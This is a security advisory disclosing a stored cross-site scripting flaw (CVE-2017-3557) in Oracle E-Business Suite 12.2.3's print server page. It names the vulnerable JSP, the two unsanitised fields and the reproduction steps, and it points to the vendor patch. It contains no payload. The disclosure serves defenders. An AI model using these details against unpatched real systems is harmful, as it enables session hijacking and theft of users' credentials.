[ERPSCAN-17-026] XSS – Oracle E-Business Suite JTFFMPRINTSERVER

Application: Oracle E-Business Suite
Versions Affected: Oracle E-Business Suite 12.2.3
Vendor: Oracle
Bugs: XSS
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Authors: Ivan Chalykin (ERPScan)

VULNERABILITY INFORMATION

Class: XSS
Impact: modify displayed content from a Web site, steal authentication information of a user
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3557

CVSS Information

CVSS Base Score v3: 7.1 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) Required (R)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity High (H)
A: Impact to AvailabilityNone (N)

VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of administrators or users of the web application.

VULNERABLE PACKAGES

Oracle E-Business Suite 12.2.3

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

TECHNICAL DESCRIPTION

The “Oracle Fulfillment Management: Print Servers” component is vulnerable to a Stored XSS attack due to the lack of sanitizing of “Print Server Name” and “Connection String” parameters.

Vulnerable URL:

http://victim_ebs_server/OA_HTML/jtffmprintserver.jsp

To reproduce the attack, you need to create a print server with XSS vector in the vulnerable parameters. This JSP is available for all E-Business Suite users.